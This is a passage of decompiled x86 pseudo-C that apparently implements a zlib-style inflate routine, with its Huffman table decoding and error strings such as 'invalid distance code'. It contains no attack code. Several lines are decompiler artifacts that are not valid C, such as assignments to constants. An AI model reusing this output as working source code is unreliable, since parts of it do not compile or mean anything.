                                                                                                                                                              															__edx = __edx + (( *( *(__ebp - 8)) & 0x000000ff) << __cl);
                                                                                                                                                              															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                                                                                              															__edi = __edi + 8;
                                                                                                                                                              															 *(__ebp - 0xc) = __edx;
                                                                                                                                                              														}
                                                                                                                                                              														L218:
                                                                                                                                                              														__edx = __edx >> __cl;
                                                                                                                                                              														__ecx = __edx;
                                                                                                                                                              														__edx = __edx >> 7;
                                                                                                                                                              														__ecx = __ecx & 0x0000007f;
                                                                                                                                                              														_push(0xfffffff9);
                                                                                                                                                              														_pop(__eax);
                                                                                                                                                              														__ecx = __ecx + 0xb;
                                                                                                                                                              														__eax = __eax -  *(__ebp - 0x10);
                                                                                                                                                              														__eflags = __eax;
                                                                                                                                                              														L219:
                                                                                                                                                              														 *(__ebp - 0x34) =  *(__ebp - 0x34) & 0x00000000;
                                                                                                                                                              														__edi = __edi + __eax;
                                                                                                                                                              														__eflags = __edi;
                                                                                                                                                              														L220:
                                                                                                                                                              														 *(__ebx + 0x64) =  *(__ebx + 0x64) +  *(__ebx + 0x60);
                                                                                                                                                              														 *(__ebp - 0x30) = __ecx;
                                                                                                                                                              														__ecx = __ecx +  *(__ebp - 0x2c);
                                                                                                                                                              														 *(__ebp - 0xc) = __edx;
                                                                                                                                                              														 *(__ebp - 0x10) = __edi;
                                                                                                                                                              														__eflags = __ecx -  *(__ebx + 0x64) +  *(__ebx + 0x60);
                                                                                                                                                              														if(__ecx >  *(__ebx + 0x64) +  *(__ebx + 0x60)) {
                                                                                                                                                              															L227:
                                                                                                                                                              															 *(__esi + 0x18) = "invalid bit length repeat";
                                                                                                                                                              															 *__ebx = 0x1d;
                                                                                                                                                              															L228:
                                                                                                                                                              															__eflags =  *__ebx - 0x1d;
                                                                                                                                                              															if( *__ebx == 0x1d) {
                                                                                                                                                              																L133:
                                                                                                                                                              																__edx =  *(__ebp - 0xc);
                                                                                                                                                              																goto L134;
                                                                                                                                                              															}
                                                                                                                                                              															L229:
                                                                                                                                                              															__eax = 0;
                                                                                                                                                              															__eflags =  *((intOrPtr*)(__ebx + 0x270)) - __ax;
                                                                                                                                                              															if( *((intOrPtr*)(__ebx + 0x270)) != __ax) {
                                                                                                                                                              																L231:
                                                                                                                                                              																__eax = __ebx + 0x530;
                                                                                                                                                              																__ecx = __ebx + 0x6c;
                                                                                                                                                              																 *(__ebx + 0x4c) = __eax;
                                                                                                                                                              																 *(__ebx + 0x6c) = __eax;
                                                                                                                                                              																__edx = __ebx + 0x54;
                                                                                                                                                              																__eax = __ebx + 0x2f0;
                                                                                                                                                              																 *(__ebx + 0x54) = 9;
                                                                                                                                                              																__eax = __ebx + 0x70;
                                                                                                                                                              																__eax = E011033B4(1, __ebx + 0x70,  *(__ebx + 0x60), __ecx, __edx, __ebx + 0x2f0);
                                                                                                                                                              																 *(__ebp - 0x20) = __eax;
                                                                                                                                                              																__eflags = __eax;
                                                                                                                                                              																if(__eax == 0) {
                                                                                                                                                              																	L233:
                                                                                                                                                              																	__ecx = __ebx + 0x6c;
                                                                                                                                                              																	__eax =  *__ecx;
                                                                                                                                                              																	__edx = __ebx + 0x58;
                                                                                                                                                              																	 *(__ebx + 0x50) =  *__ecx;
                                                                                                                                                              																	__ebx + 0x2f0 =  *(__ebx + 0x60);
                                                                                                                                                              																	__eax =  *(__ebx + 0x60) + 0x38;
                                                                                                                                                              																	 *(__ebx + 0x58) = 6;
                                                                                                                                                              																	__eax = __ebx + ( *(__ebx + 0x60) + 0x38) * 2;
                                                                                                                                                              																	__eax = E011033B4(2, __ebx + ( *(__ebx + 0x60) + 0x38) * 2,  *(__ebx + 0x64), __ecx, __edx, __ebx + 0x2f0);
                                                                                                                                                              																	 *(__ebp - 0x20) = __eax;
                                                                                                                                                              																	__eflags = __eax;
                                                                                                                                                              																	if(__eax == 0) {
                                                                                                                                                              																		L235:
                                                                                                                                                              																		__eflags =  *((intOrPtr*)(__ebp + 0xc)) - 6;
                                                                                                                                                              																		__ecx =  *(__ebp - 4);
                                                                                                                                                              																		 *__ebx = 0x13;
                                                                                                                                                              																		if( *((intOrPtr*)(__ebp + 0xc)) == 6) {
                                                                                                                                                              																			goto L323;
                                                                                                                                                              																		}
                                                                                                                                                              																		L236:
                                                                                                                                                              																		__edx =  *(__ebp - 0xc);
                                                                                                                                                              																		goto L237;
                                                                                                                                                              																	}
                                                                                                                                                              																	L234:
                                                                                                                                                              																	 *(__esi + 0x18) = "invalid distances set";
                                                                                                                                                              																	L195:
                                                                                                                                                              																	 *__ebx = 0x1d;
                                                                                                                                                              																	goto L133;
                                                                                                                                                              																}
                                                                                                                                                              																L232:
                                                                                                                                                              																 *(__esi + 0x18) = "invalid literal/lengths set";
                                                                                                                                                              																goto L195;
                                                                                                                                                              															}
                                                                                                                                                              															L230:
                                                                                                                                                              															 *(__esi + 0x18) = "invalid code -- missing end-of-block";
                                                                                                                                                              															goto L195;
                                                                                                                                                              														}
                                                                                                                                                              														L221:
                                                                                                                                                              														__ecx =  *(__ebp - 0x30);
                                                                                                                                                              														__eflags = __ecx;
                                                                                                                                                              														if(__ecx == 0) {
                                                                                                                                                              															continue;
                                                                                                                                                              														}
                                                                                                                                                              														L222:
                                                                                                                                                              														__edx =  *(__ebp - 0x34);
                                                                                                                                                              														do {
                                                                                                                                                              															L223:
                                                                                                                                                              															__eax =  *(__ebx + 0x68);
                                                                                                                                                              															 *((short*)(__ebx + 0x70 +  *(__ebx + 0x68) * 2)) = __dx;
                                                                                                                                                              															 *(__ebx + 0x68) =  *(__ebx + 0x68) + 1;
                                                                                                                                                              															__ecx = __ecx - 1;
                                                                                                                                                              															__eflags = __ecx;
                                                                                                                                                              														} while (__ecx != 0);
                                                                                                                                                              														continue;
                                                                                                                                                              													}
                                                                                                                                                              													L209:
                                                                                                                                                              													 *(__ebp - 0x10) = __ecx;
                                                                                                                                                              													while(1) {
                                                                                                                                                              														L210:
                                                                                                                                                              														_t422 = __ecx + 3; // 0x14
                                                                                                                                                              														__eax = _t422;
                                                                                                                                                              														__eflags = __edi - _t422;
                                                                                                                                                              														if(__edi >= _t422) {
                                                                                                                                                              															break;
                                                                                                                                                              														}
                                                                                                                                                              														L211:
                                                                                                                                                              														__ecx =  *(__ebp - 4);
                                                                                                                                                              														__eflags = __ecx;
                                                                                                                                                              														if(__ecx == 0) {
                                                                                                                                                              															goto L323;
                                                                                                                                                              														}
                                                                                                                                                              														L212:
                                                                                                                                                              														__eax =  *(__ebp - 8);
                                                                                                                                                              														 *(__ebp - 4) = __ecx;
                                                                                                                                                              														__ecx = __edi;
                                                                                                                                                              														 *( *(__ebp - 8)) & 0x000000ff = ( *( *(__ebp - 8)) & 0x000000ff) << __cl;
                                                                                                                                                              														__ecx =  *(__ebp - 0x10);
                                                                                                                                                              														__edx = __edx + (( *( *(__ebp - 8)) & 0x000000ff) << __cl);
                                                                                                                                                              														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                                                                                              														__edi = __edi + 8;
                                                                                                                                                              														 *(__ebp - 0xc) = __edx;
                                                                                                                                                              													}
                                                                                                                                                              													L213:
                                                                                                                                                              													__edx = __edx >> __cl;
                                                                                                                                                              													__ecx = __edx;
                                                                                                                                                              													__edx = __edx >> 3;
                                                                                                                                                              													__ecx = __ecx & 0x00000007;
                                                                                                                                                              													_push(0xfffffffd);
                                                                                                                                                              													_pop(__eax);
                                                                                                                                                              													__ecx = __ecx + 3;
                                                                                                                                                              													__eax = __eax -  *(__ebp - 0x10);
                                                                                                                                                              													goto L219;
                                                                                                                                                              												}
                                                                                                                                                              												L203:
                                                                                                                                                              												__eax = __eax >> 8;
                                                                                                                                                              												__ecx = __cl & 0x000000ff;
                                                                                                                                                              												__ecx = (__cl & 0x000000ff) + 2;
                                                                                                                                                              												 *(__ebp - 0x34) = __ecx;
                                                                                                                                                              												__eflags = __edi - __ecx;
                                                                                                                                                              												if(__edi >= __ecx) {
                                                                                                                                                              													L206:
                                                                                                                                                              													__edx =  *(__ebp - 0xc);
                                                                                                                                                              													__ecx = __ah & 0x000000ff;
                                                                                                                                                              													__eax =  *(__ebp - 0x2c);
                                                                                                                                                              													__edi = __edi - __ecx;
                                                                                                                                                              													__edx =  *(__ebp - 0xc) >> __cl;
                                                                                                                                                              													 *(__ebp - 0xc) = __edx;
                                                                                                                                                              													 *(__ebp - 0x10) = __edi;
                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                              													if(__eax == 0) {
                                                                                                                                                              														L226:
                                                                                                                                                              														 *(__esi + 0x18) = "invalid bit length repeat";
                                                                                                                                                              														goto L17;
                                                                                                                                                              													}
                                                                                                                                                              													L207:
                                                                                                                                                              													__eax =  *(__ebx + 0x6e + __eax * 2) & 0x0000ffff;
                                                                                                                                                              													__ecx = __edx;
                                                                                                                                                              													__ecx = __edx & 0x00000003;
                                                                                                                                                              													__edx = __edx >> 2;
                                                                                                                                                              													__ecx = __ecx + 3;
                                                                                                                                                              													 *(__ebp - 0x34) = __eax;
                                                                                                                                                              													__edi = __edi - 2;
                                                                                                                                                              													goto L220;
                                                                                                                                                              												} else {
                                                                                                                                                              													goto L204;
                                                                                                                                                              												}
                                                                                                                                                              												while(1) {
                                                                                                                                                              													L204:
                                                                                                                                                              													__ecx =  *(__ebp - 4);
                                                                                                                                                              													__eflags = __ecx;
                                                                                                                                                              													if(__ecx == 0) {
                                                                                                                                                              														goto L323;
                                                                                                                                                              													}
                                                                                                                                                              													L205:
                                                                                                                                                              													 *(__ebp - 4) = __ecx;
                                                                                                                                                              													__ecx =  *(__ebp - 8);
                                                                                                                                                              													__edx =  *( *(__ebp - 8)) & 0x000000ff;
                                                                                                                                                              													__ecx = __edi;
                                                                                                                                                              													__edx = ( *( *(__ebp - 8)) & 0x000000ff) << __cl;
                                                                                                                                                              													__edi = __edi + 8;
                                                                                                                                                              													 *(__ebp - 0xc) =  *(__ebp - 0xc) + (( *( *(__ebp - 8)) & 0x000000ff) << __cl);
                                                                                                                                                              													 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                                                                                              													__eflags = __edi -  *(__ebp - 0x34);
                                                                                                                                                              													if(__edi <  *(__ebp - 0x34)) {
                                                                                                                                                              														continue;
                                                                                                                                                              													}
                                                                                                                                                              													goto L206;
                                                                                                                                                              												}
                                                                                                                                                              												goto L323;
                                                                                                                                                              											}
                                                                                                                                                              											L201:
                                                                                                                                                              											__eax = __eax >> 8;
                                                                                                                                                              											__ecx = __al & 0x000000ff;
                                                                                                                                                              											__eax =  *(__ebp - 0x2c);
                                                                                                                                                              											__edi = __edi - (__al & 0x000000ff);
                                                                                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) >> __cl;
                                                                                                                                                              											 *(__ebp - 0x10) = __edi;
                                                                                                                                                              											 *((short*)(__ebx + 0x70 +  *(__ebp - 0x2c) * 2)) = __dx;
                                                                                                                                                              											 *(__ebx + 0x68) =  *(__ebx + 0x68) + 1;
                                                                                                                                                              										}
                                                                                                                                                              										L225:
                                                                                                                                                              										goto L228;
                                                                                                                                                              									case 0x13:
                                                                                                                                                              										L237:
                                                                                                                                                              										 *__ebx = 0x14;
                                                                                                                                                              										goto L238;
                                                                                                                                                              									case 0x14:
                                                                                                                                                              										L238:
                                                                                                                                                              										__eflags = __ecx - 6;
                                                                                                                                                              										if(__ecx < 6) {
                                                                                                                                                              											L242:
                                                                                                                                                              											__eax =  *(__ebx + 0x4c);
                                                                                                                                                              											__ecx =  *(__ebx + 0x54);
                                                                                                                                                              											 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) & 0x00000000;
                                                                                                                                                              											 *(__ebp - 0x30) =  *(__ebx + 0x4c);
                                                                                                                                                              											0 = 1;
                                                                                                                                                              											__eax = 1 << __cl;
                                                                                                                                                              											__ecx =  *(__ebx + 0x4c);
                                                                                                                                                              											__eax = (1 << __cl) - 1;
                                                                                                                                                              											__eax = (1 << __cl) - 0x00000001 & __edx;
                                                                                                                                                              											__eax =  *( *(__ebx + 0x4c) + ((1 << __cl) - 0x00000001 & __edx) * 4);
                                                                                                                                                              											while(1) {
                                                                                                                                                              												L245:
                                                                                                                                                              												__eax = __eax >> 8;
                                                                                                                                                              												__ecx = __cl & 0x000000ff;
                                                                                                                                                              												__eflags = (__cl & 0x000000ff) - __edi;
                                                                                                                                                              												if((__cl & 0x000000ff) <= __edi) {
                                                                                                                                                              													break;
                                                                                                                                                              												}
                                                                                                                                                              												L243:
                                                                                                                                                              												__ecx =  *(__ebp - 4);
                                                                                                                                                              												__eflags = __ecx;
                                                                                                                                                              												if(__ecx == 0) {
                                                                                                                                                              													goto L323;
                                                                                                                                                              												}
                                                                                                                                                              												L244:
                                                                                                                                                              												__eax =  *(__ebp - 8);
                                                                                                                                                              												 *(__ebp - 4) = __ecx;
                                                                                                                                                              												__ecx = __edi;
                                                                                                                                                              												__edi = __edi + 8;
                                                                                                                                                              												 *(__ebp - 0x10) = __edi;
                                                                                                                                                              												 *( *(__ebp - 8)) & 0x000000ff = ( *( *(__ebp - 8)) & 0x000000ff) << __cl;
                                                                                                                                                              												__ecx =  *(__ebx + 0x54);
                                                                                                                                                              												__edx = __edx + (( *( *(__ebp - 8)) & 0x000000ff) << __cl);
                                                                                                                                                              												 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                                                                                                                              												__eax =  *(__ebx + 0x4c);
                                                                                                                                                              												 *(__ebp - 0xc) = __edx;
                                                                                                                                                              												0 = 1;
                                                                                                                                                              												1 << __cl = (1 << __cl) - 1;
                                                                                                                                                              												__edx = (1 << __cl) - 0x00000001 &  *(__ebp - 0xc);
                                                                                                                                                              												__eflags = 1;
                                                                                                                                                              												__eax =  *( *(__ebx + 0x4c) + ((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) * 4);
                                                                                                                                                              												__edx =  *(__ebp - 0xc);
                                                                                                                                                              											}
                                                                                                                                                              											L246:
                                                                                                                                                              											__eflags = __al;
                                                                                                                                                              											if(__al == 0) {
                                                                                                                                                              												L252:
                                                                                                                                                              												__eax = __eax >> 8;
                                                                                                                                                              												__ecx = __cl & 0x000000ff;
                                                                                                                                                              												 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) + __ecx;
                                                                                                                                                              												__edi = __edi - __ecx;
                                                                                                                                                              												__edx = __edx >> __cl;
                                                                                                                                                              												__ecx = __eax;
                                                                                                                                                              												__ecx = __eax >> 0x10;
                                                                                                                                                              												 *(__ebp - 0xc) = __edx;
                                                                                                                                                              												 *(__ebp - 0x10) = __edi;
                                                                                                                                                              												 *(__ebx + 0x40) = __ecx;
                                                                                                                                                              												__eflags = __al;
                                                                                                                                                              												if(__al != 0) {
                                                                                                                                                              													L254:
                                                                                                                                                              													__eflags = __al & 0x00000020;
                                                                                                                                                              													if((__al & 0x00000020) == 0) {
                                                                                                                                                              														L256:
                                                                                                                                                              														__ecx =  *(__ebp - 4);
                                                                                                                                                              														__eflags = __al & 0x00000040;
                                                                                                                                                              														if((__al & 0x00000040) == 0) {
                                                                                                                                                              															L258:
                                                                                                                                                              															__eax = __al & 0x000000ff;
                                                                                                                                                              															__eax = __al & 0xf;
                                                                                                                                                              															__eflags = __eax;
                                                                                                                                                              															 *__ebx = 0x15;
                                                                                                                                                              															 *(__ebx + 0x48) = __eax;
                                                                                                                                                              															goto L259;
                                                                                                                                                              														}
                                                                                                                                                              														L257:
                                                                                                                                                              														 *(__esi + 0x18) = "invalid literal/length code";
                                                                                                                                                              														L31:
                                                                                                                                                              														 *__ebx = 0x1d;
                                                                                                                                                              														goto L135;
                                                                                                                                                              													}
                                                                                                                                                              													L255:
                                                                                                                                                              													 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) | 0xffffffff;
                                                                                                                                                              													 *__ebx = 0xb;
                                                                                                                                                              													goto L134;
                                                                                                                                                              												}
                                                                                                                                                              												L253:
                                                                                                                                                              												 *__ebx = 0x19;
                                                                                                                                                              												goto L134;
                                                                                                                                                              											}
                                                                                                                                                              											L247:
                                                                                                                                                              											__eflags = __al & 0x000000f0;
                                                                                                                                                              											if((__al & 0x000000f0) != 0) {
                                                                                                                                                              												goto L252;
                                                                                                                                                              											}
                                                                                                                                                              											L248:
                                                                                                                                                              											__edi = 0;
                                                                                                                                                              											__ecx = __al & 0x000000ff;
                                                                                                                                                              											__ebx = __eax;
                                                                                                                                                              											__edi = 1;
                                                                                                                                                              											__ebx = __eax >> 8;
                                                                                                                                                              											__edx = __eax;
                                                                                                                                                              											__esi = __bl & 0x000000ff;
                                                                                                                                                              											__ecx = (__al & 0x000000ff) + __esi;
                                                                                                                                                              											__eax = __eax >> 0x10;
                                                                                                                                                              											__edi = 1 << __cl;
                                                                                                                                                              											__ecx = __esi;
                                                                                                                                                              											__edi = (1 << __cl) - 1;
                                                                                                                                                              											 *(__ebp - 0x34) = __edx;
                                                                                                                                                              											(1 << __cl) - 0x00000001 &  *(__ebp - 0xc) = ((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl;
                                                                                                                                                              											__ecx =  *(__ebp - 0x30);
                                                                                                                                                              											__edi = __eax + (((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl);
                                                                                                                                                              											__eax =  *( *(__ebp - 0x30) + (__eax + (((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl)) * 4);
                                                                                                                                                              											__ecx = __eax;
                                                                                                                                                              											__edi =  *(__ebp - 0x10);
                                                                                                                                                              											__ecx = __eax >> 8;
                                                                                                                                                              											__esi = __cl & 0x000000ff;
                                                                                                                                                              											__ecx = __bl & 0x000000ff;
                                                                                                                                                              											__ebx =  *(__ebp - 0x24);
                                                                                                                                                              											__esi = (__cl & 0x000000ff) + (__bl & 0x000000ff);
                                                                                                                                                              											__eflags = (__cl & 0x000000ff) + (__bl & 0x000000ff) - __edi;
                                                                                                                                                              											if((__cl & 0x000000ff) + (__bl & 0x000000ff) <= __edi) {
                                                                                                                                                              												L251:
                                                                                                                                                              												__esi =  *(__ebp + 8);
                                                                                                                                                              												__ecx = __dh & 0x000000ff;
                                                                                                                                                              												__edx =  *(__ebp - 0xc);
                                                                                                                                                              												__edx =  *(__ebp - 0xc) >> __cl;
                                                                                                                                                              												__edi = __edi - __ecx;
                                                                                                                                                              												__eflags = __edi;
                                                                                                                                                              												 *(__ebx + 0x1bc4) = __ecx;
                                                                                                                                                              												goto L252;
                                                                                                                                                              											} else {
                                                                                                                                                              												goto L249;
                                                                                                                                                              											}
                                                                                                                                                              											while(1) {
                                                                                                                                                              												L249:
                                                                                                                                                              												__esi =  *(__ebp - 4);
                                                                                                                                                              												__eflags = __esi;
                                                                                                                                                              												if(__esi == 0) {
                                                                                                                                                              													goto L322;
                                                                                                                                                              												}
                                                                                                                                                              												L250:
                                                                                                                                                              												__esi = __esi - 1;
                                                                                                                                                              												__ecx = __edi;
                                                                                                                                                              												 *(__ebp - 4) = __esi;
                                                                                                                                                              												__edi = __edi + 8;
                                                                                                                                                              												__esi =  *(__ebp - 8);
                                                                                                                                                              												 *(__ebp - 0x10) = __edi;
                                                                                                                                                              												__edi = __dh & 0x000000ff;
                                                                                                                                                              												 *__esi & 0x000000ff = ( *__esi & 0x000000ff) << __cl;
                                                                                                                                                              												 *(__ebp - 0xc) =  *(__ebp - 0xc) + (( *__esi & 0x000000ff) << __cl);
                                                                                                                                                              												__esi = __esi + 1;
                                                                                                                                                              												__eax =  *(__ebp - 0x32) & 0x0000ffff;
                                                                                                                                                              												 *(__ebp - 8) = __esi;
                                                                                                                                                              												0 = 1;
                                                                                                                                                              												__dl & 0x000000ff = __edi + (__dl & 0x000000ff);
                                                                                                                                                              												__esi = 1 << __cl;
                                                                                                                                                              												__ecx = __edi;
                                                                                                                                                              												(1 << __cl) - 1 = (1 << __cl) - 0x00000001 &  *(__ebp - 0xc);
                                                                                                                                                              												__esi = ((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl;
                                                                                                                                                              												__esi = (((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl) + ( *(__ebp - 0x32) & 0x0000ffff);
                                                                                                                                                              												__eax =  *(__ebx + 0x4c);
                                                                                                                                                              												__eax =  *( *(__ebx + 0x4c) + ((((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl) + ( *(__ebp - 0x32) & 0x0000ffff)) * 4);
                                                                                                                                                              												__eax = __eax >> 8;
                                                                                                                                                              												__ecx = __cl & 0x000000ff;
                                                                                                                                                              												__ecx = __edi + (__cl & 0x000000ff);
                                                                                                                                                              												__edi =  *(__ebp - 0x10);
                                                                                                                                                              												__eflags = __ecx - __edi;
                                                                                                                                                              												if(__ecx > __edi) {
                                                                                                                                                              													continue;
                                                                                                                                                              												}
                                                                                                                                                              												goto L251;
                                                                                                                                                              											}
                                                                                                                                                              											goto L322;
                                                                                                                                                              										}
                                                                                                                                                              										L239:
                                                                                                                                                              										__eax =  *(__ebp - 0x18);
                                                                                                                                                              										__eflags = __eax - 0x102;
                                                                                                                                                              										if(__eax < 0x102) {
                                                                                                                                                              											goto L242;
                                                                                                                                                              										}
                                                                                                                                                              										L240:
                                                                                                                                                              										__ebx =  *(__ebp - 0x1c);
                                                                                                                                                              										_push( *(__ebp - 0x28));
                                                                                                                                                              										 *(__esi + 0xc) =  *(__ebp - 0x1c);
                                                                                                                                                              										__ebx =  *(__ebp - 0x24);
                                                                                                                                                              										 *(__esi + 0x10) = __eax;
                                                                                                                                                              										__eax =  *(__ebp - 8);
                                                                                                                                                              										 *__esi =  *(__ebp - 8);
                                                                                                                                                              										 *(__esi + 4) = __ecx;
                                                                                                                                                              										_push(__esi);
                                                                                                                                                              										 *(__ebx + 0x38) = __edx;
                                                                                                                                                              										 *(__ebx + 0x3c) = __edi;
                                                                                                                                                              										__eax = E01103840();
                                                                                                                                                              										__eflags =  *__ebx - 0xb;
                                                                                                                                                              										__eax =  *(__esi + 0xc);
                                                                                                                                                              										__edx =  *(__ebx + 0x38);
                                                                                                                                                              										__edi =  *(__ebx + 0x3c);
                                                                                                                                                              										_pop(__ecx);
                                                                                                                                                              										 *(__ebp - 0x1c) =  *(__esi + 0xc);
                                                                                                                                                              										__eax =  *(__esi + 0x10);
                                                                                                                                                              										_pop(__ecx);
                                                                                                                                                              										__ecx =  *(__esi + 4);
                                                                                                                                                              										 *(__ebp - 0x18) =  *(__esi + 0x10);
                                                                                                                                                              										__eax =  *__esi;
                                                                                                                                                              										 *(__ebp - 8) =  *__esi;
                                                                                                                                                              										 *(__ebp - 4) = __ecx;
                                                                                                                                                              										 *(__ebp - 0xc) = __edx;
                                                                                                                                                              										 *(__ebp - 0x10) = __edi;
                                                                                                                                                              										if( *__ebx == 0xb) {
                                                                                                                                                              											 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) | 0xffffffff;
                                                                                                                                                              										}
                                                                                                                                                              										goto L135;
                                                                                                                                                              									case 0x15:
                                                                                                                                                              										L259:
                                                                                                                                                              										__esi =  *(__ebx + 0x48);
                                                                                                                                                              										__eflags = __esi;
                                                                                                                                                              										if(__esi == 0) {
                                                                                                                                                              											L265:
                                                                                                                                                              											__eax =  *(__ebx + 0x40);
                                                                                                                                                              											 *(__ebx + 0x1bc8) =  *(__ebx + 0x40);
                                                                                                                                                              											 *__ebx = 0x16;
                                                                                                                                                              											goto L266;
                                                                                                                                                              										}
                                                                                                                                                              										L260:
                                                                                                                                                              										__eflags = __edi - __esi;
                                                                                                                                                              										if(__edi >= __esi) {
                                                                                                                                                              											L264:
                                                                                                                                                              											__eax = 0;
                                                                                                                                                              											__ecx = __esi;
                                                                                                                                                              											__eax = 1;
                                                                                                                                                              											__edi = __edi - __esi;
                                                                                                                                                              											1 << __cl = (1 << __cl) - 1;
                                                                                                                                                              											 *(__ebp - 0x10) = __edi;
                                                                                                                                                              											__eax = (1 << __cl) - 0x00000001 & __edx;
                                                                                                                                                              											__edx = __edx >> __cl;
                                                                                                                                                              											 *(__ebx + 0x40) =  *(__ebx + 0x40) + __eax;
                                                                                                                                                              											_t580 = __ebx + 0x1bc4;
                                                                                                                                                              											 *_t580 =  *(__ebx + 0x1bc4) + __esi;
                                                                                                                                                              											__eflags =  *_t580;
                                                                                                                                                              											 *(__ebp - 0xc) = __edx;
                                                                                                                                                              											goto L265;
                                                                                                                                                              										}
                                                                                                                                                              										L261:
                                                                                                                                                              										__eax =  *(__ebp - 8);
                                                                                                                                                              										while(1) {
                                                                                                                                                              											L262:
                                                                                                                                                              											__eflags = __ecx;
                                                                                                                                                              											if(__ecx == 0) {
                                                                                                                                                              												goto L322;
                                                                                                                                                              											}
                                                                                                                                                              											L263:
                                                                                                                                                              											__eax =  *__eax & 0x000000ff;
                                                                                                                                                              											 *(__ebp - 4) = __ecx;
                                                                                                                                                              											__ecx = __edi;
                                                                                                                                                              											__eax = __eax << __cl;
                                                                                                                                                              											__edi = __edi + 8;
                                                                                                                                                              											__ecx =  *(__ebp - 4);
                                                                                                                                                              											__edx = __eax + __edx;
                                                                                                                                                              											__eax =  *(__ebp - 8);
                                                                                                                                                              											__eax =  *(__ebp - 8) + 1;
                                                                                                                                                              											 *(__ebp - 0xc) = __edx;
                                                                                                                                                              											 *(__ebp - 8) = __eax;
                                                                                                                                                              											__eflags = __edi - __esi;
                                                                                                                                                              											if(__edi < __esi) {
                                                                                                                                                              												continue;
                                                                                                                                                              											}
                                                                                                                                                              											goto L264;
                                                                                                                                                              										}
                                                                                                                                                              										goto L322;
                                                                                                                                                              									case 0x16:
                                                                                                                                                              										L266:
                                                                                                                                                              										__ecx =  *(__ebx + 0x58);
                                                                                                                                                              										__eax = 0;
                                                                                                                                                              										__esi =  *(__ebx + 0x50);
                                                                                                                                                              										1 = 1 << __cl;
                                                                                                                                                              										__eax = (1 << __cl) - 1;
                                                                                                                                                              										 *(__ebp - 0x30) = __esi;
                                                                                                                                                              										__eax = (1 << __cl) - 0x00000001 & __edx;
                                                                                                                                                              										__eax =  *(__esi + ((1 << __cl) - 0x00000001 & __edx) * 4);
                                                                                                                                                              										1 = 1 >> 8;
                                                                                                                                                              										__ecx = __cl & 0x000000ff;
                                                                                                                                                              										__eflags = (__cl & 0x000000ff) - __edi;
                                                                                                                                                              										if((__cl & 0x000000ff) <= __edi) {
                                                                                                                                                              											L270:
                                                                                                                                                              											__eflags = __al & 0x000000f0;
                                                                                                                                                              											if((__al & 0x000000f0) != 0) {
                                                                                                                                                              												L275:
                                                                                                                                                              												__esi =  *(__ebp + 8);
                                                                                                                                                              												__eax = __eax >> 8;
                                                                                                                                                              												__ecx = __cl & 0x000000ff;
                                                                                                                                                              												 *(__ebx + 0x1bc4) =  *(__ebx + 0x1bc4) + __ecx;
                                                                                                                                                              												__edi = __edi - __ecx;
                                                                                                                                                              												__edx = __edx >> __cl;
                                                                                                                                                              												 *(__ebp - 0xc) = __edx;
                                                                                                                                                              												 *(__ebp - 0x10) = __edi;
                                                                                                                                                              												__eflags = __al & 0x00000040;
                                                                                                                                                              												if((__al & 0x00000040) == 0) {
                                                                                                                                                              													L277:
                                                                                                                                                              													__ecx = __eax;
                                                                                                                                                              													 *__ebx = 0x17;
                                                                                                                                                              													__ecx = __eax >> 0x10;
                                                                                                                                                              													__eax = __al & 0x000000ff;
                                                                                                                                                              													__eax = __al & 0xf;
                                                                                                                                                              													__eflags = __eax;
                                                                                                                                                              													 *(__ebx + 0x44) = __ecx;
                                                                                                                                                              													 *(__ebx + 0x48) = __eax;
                                                                                                                                                              													goto L278;
                                                                                                                                                              												}
                                                                                                                                                              												L276:
                                                                                                                                                              												 *(__esi + 0x18) = "invalid distance code";
                                                                                                                                                              												goto L17;
                                                                                                                                                              											}
                                                                                                                                                              											L271:
                                                                                                                                                              											__edi = 0;
                                                                                                                                                              											__ecx = __al & 0x000000ff;
                                                                                                                                                              											__ebx = __eax;
                                                                                                                                                              											__edi = 1;
                                                                                                                                                              											__ebx = __eax >> 8;
                                                                                                                                                              											__edx = __eax;
                                                                                                                                                              											__esi = __bl & 0x000000ff;
                                                                                                                                                              											__ecx = (__al & 0x000000ff) + __esi;
                                                                                                                                                              											__eax = __eax >> 0x10;
                                                                                                                                                              											__edi = 1 << __cl;
                                                                                                                                                              											__ecx = __esi;
                                                                                                                                                              											__edi = (1 << __cl) - 1;
                                                                                                                                                              											 *(__ebp - 0x34) = __edx;
                                                                                                                                                              											(1 << __cl) - 0x00000001 &  *(__ebp - 0xc) = ((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl;
                                                                                                                                                              											__ecx =  *(__ebp - 0x30);
                                                                                                                                                              											__edi = __eax + (((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl);
                                                                                                                                                              											__eax =  *( *(__ebp - 0x30) + (__eax + (((1 << __cl) - 0x00000001 &  *(__ebp - 0xc)) >> __cl)) * 4);
                                                                                                                                                              											__ecx = __eax;
                                                                                                                                                              											__edi =  *(__ebp - 0x10);
                                                                                                                                                              											__ecx = __eax >> 8;
                                                                                                                                                              											__esi = __cl & 0x000000ff;
                                                                                                                                                              											__ecx = __bl & 0x000000ff;
                                                                                                                                                              											__ebx =  *(__ebp - 0x24);
                                                                                                                                                              											__esi = (__cl & 0x000000ff) + (__bl & 0x000000ff);
                                                                                                                                                              											__eflags = (__cl & 0x000000ff) + (__bl & 0x000000ff) - __edi;
                                                                                                                                                              											if((__cl & 0x000000ff) + (__bl & 0x000000ff) <= __edi) {
                                                                                                                                                              												L274:
                                                                                                                                                              												__ecx = __dh & 0x000000ff;
                                                                                                                                                              												__edx =  *(__ebp - 0xc);
                                                                                                                                                              												__edi = __edi - __ecx;
